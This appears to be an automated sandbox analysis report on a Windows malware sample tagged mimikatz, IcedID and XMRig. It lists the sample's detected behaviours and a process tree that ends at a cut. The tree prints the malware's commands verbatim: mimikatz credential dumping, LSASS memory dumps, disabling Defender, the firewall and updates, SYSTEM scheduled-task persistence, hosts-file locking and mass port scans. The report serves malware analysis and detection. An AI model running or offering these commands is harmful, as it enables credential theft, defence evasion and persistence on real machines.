Analysis

  • max time kernel
    150s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-01-2025 02:54

General

  • Target

    2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe

  • Size

    7.1MB

  • MD5

    6d0ddf752c28b5478dc5cd32311e9b11

  • SHA1

    2acaa939e8c31dda164e87ccabbcf65b6e77e494

  • SHA256

    a81aec0ecacb02afcfb6829fc0260fb5d84c2e55d74422d341296b2ad548f33f

  • SHA512

    e570076f0541716b364bd355f10d96a2b5a42618c26b78b9b686bf9258be26653e34135421b0c4c77e06011b40b9bdeec0fe22241bedfa21edb6477bda487f64

  • SSDEEP

    196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (31215) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 3 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 35 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2116
      • C:\Windows\TEMP\nqazjegtg\uieubf.exe
        "C:\Windows\TEMP\nqazjegtg\uieubf.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2892
    • C:\Users\Admin\AppData\Local\Temp\2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-01-07_6d0ddf752c28b5478dc5cd32311e9b11_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\klhnlzly\byuzvnr.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4636
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4556
        • C:\Windows\klhnlzly\byuzvnr.exe
          C:\Windows\klhnlzly\byuzvnr.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3016
    • C:\Windows\klhnlzly\byuzvnr.exe
      C:\Windows\klhnlzly\byuzvnr.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:100
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3704
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1468
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:2628
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2280
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4768
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1576
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4596
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:1764
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:644
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2056
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2920
          • C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe
            C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:388
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2576
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:4384
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4828
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                    PID:2308
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3992
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                      PID:2300
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2240
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4276
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                  PID:4928
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:5048
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4448
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3772
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:2860
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3952
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:984
                  • C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe
                    C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\hgpuenbvt\lzvztyutv\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1468
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\hgpuenbvt\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:5008
                  • C:\Windows\hgpuenbvt\Corporate\vfshost.exe
                    C:\Windows\hgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1308
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zrhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\byuzvnr.exe"
                  2⤵
                    PID:740
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4136
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "zrhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\byuzvnr.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4220
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dlttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2360
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3376
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "dlttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:3124
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F"
                    2⤵
                      PID:228
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4408
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "yyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:3500
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1196
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1980
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3960
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2356
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:5028
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4952
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4296
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3228
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4376
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2004
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1652
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1528
                    • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                      C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 788 C:\Windows\TEMP\hgpuenbvt\788.dmp
                      2⤵
                      • Executes dropped EXE
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2884
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop SharedAccess
                      2⤵
                        PID:1736
                        • C:\Windows\SysWOW64\net.exe
                          net stop SharedAccess
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4964
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop SharedAccess
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2924
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh firewall set opmode mode=disable
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:760
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:5112
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh Advfirewall set allprofiles state off
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3608
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh Advfirewall set allprofiles state off
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2440
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop MpsSvc
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2936
                        • C:\Windows\SysWOW64\net.exe
                          net stop MpsSvc
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3864
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop MpsSvc
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:2876
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop WinDefend
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2940
                        • C:\Windows\SysWOW64\net.exe
                          net stop WinDefend
                          3⤵
                            PID:4232
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop WinDefend
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2360
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop wuauserv
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1860
                          • C:\Windows\SysWOW64\net.exe
                            net stop wuauserv
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3128
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:3756
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c sc config MpsSvc start= disabled
                          2⤵
                            PID:2284
                            • C:\Windows\SysWOW64\sc.exe
                              sc config MpsSvc start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:4620
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config SharedAccess start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2568
                            • C:\Windows\SysWOW64\sc.exe
                              sc config SharedAccess start= disabled
                              3⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:1220
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config WinDefend start= disabled
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:680
                            • C:\Windows\SysWOW64\sc.exe
                              sc config WinDefend start= disabled
                              3⤵
                              • Launches sc.exe
                              PID:4704
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c sc config wuauserv start= disabled
                            2⤵
                              PID:1764
                              • C:\Windows\SysWOW64\sc.exe
                                sc config wuauserv start= disabled
                                3⤵
                                • Launches sc.exe
                                PID:2444
                            • C:\Windows\TEMP\xohudmc.exe
                              C:\Windows\TEMP\xohudmc.exe
                              2⤵
                              • Executes dropped EXE
                              • Drops file in System32 directory
                              • Suspicious use of SetWindowsHookEx
                              PID:4740
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 384 C:\Windows\TEMP\hgpuenbvt\384.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3992
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 2116 C:\Windows\TEMP\hgpuenbvt\2116.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2920
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 2676 C:\Windows\TEMP\hgpuenbvt\2676.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1652
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 2800 C:\Windows\TEMP\hgpuenbvt\2800.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1528
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 2896 C:\Windows\TEMP\hgpuenbvt\2896.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1532
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 692 C:\Windows\TEMP\hgpuenbvt\692.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3620
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 3740 C:\Windows\TEMP\hgpuenbvt\3740.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3704
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 3832 C:\Windows\TEMP\hgpuenbvt\3832.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4456
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 3916 C:\Windows\TEMP\hgpuenbvt\3916.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3524
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 4012 C:\Windows\TEMP\hgpuenbvt\4012.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1676
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 2348 C:\Windows\TEMP\hgpuenbvt\2348.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3576
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 3824 C:\Windows\TEMP\hgpuenbvt\3824.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:348
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 2468 C:\Windows\TEMP\hgpuenbvt\2468.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3540
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 1192 C:\Windows\TEMP\hgpuenbvt\1192.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2212
                            • C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe
                              C:\Windows\TEMP\hgpuenbvt\lllgdyunt.exe -accepteula -mp 1068 C:\Windows\TEMP\hgpuenbvt\1068.dmp
                              2⤵
                              • Executes dropped EXE
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4480
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c C:\Windows\hgpuenbvt\lzvztyutv\scan.bat
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2476
                              • C:\Windows\hgpuenbvt\lzvztyutv\ruznevtjd.exe
                                ruznevtjd.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:3028
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:1416
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2240
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4272
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3128
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2932
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4092
                              • C:\Windows\SysWOW64\cacls.exe
                                cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                3⤵
                                  PID:2732
                            • C:\Windows\SysWOW64\meouau.exe
                              C:\Windows\SysWOW64\meouau.exe
                              1⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of SetWindowsHookEx
                              PID:4844
                            • C:\Windows\system32\cmd.EXE
                              C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F
                              1⤵
                                PID:2936
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                  2⤵
                                    PID:1392
                                  • C:\Windows\system32\cacls.exe
                                    cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F
                                    2⤵
                                      PID:1460
                                  • C:\Windows\system32\cmd.EXE
                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F
                                    1⤵
                                      PID:3188
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        2⤵
                                          PID:400
                                        • C:\Windows\system32\cacls.exe
                                          cacls C:\Windows\TEMP\nqazjegtg\uieubf.exe /p everyone:F
                                          2⤵
                                            PID:2424
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\byuzvnr.exe
                                          1⤵
                                            PID:3528
                                            • C:\Windows\ime\byuzvnr.exe
                                              C:\Windows\ime\byuzvnr.exe
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:3936
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F
                                            1⤵
                                              PID:3092
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                2⤵
                                                  PID:1448
                                                • C:\Windows\system32\cacls.exe
                                                  cacls C:\Windows\klhnlzly\byuzvnr.exe /p everyone:F
                                                  2⤵
                                                    PID:220
                                                • C:\Windows\system32\cmd.EXE
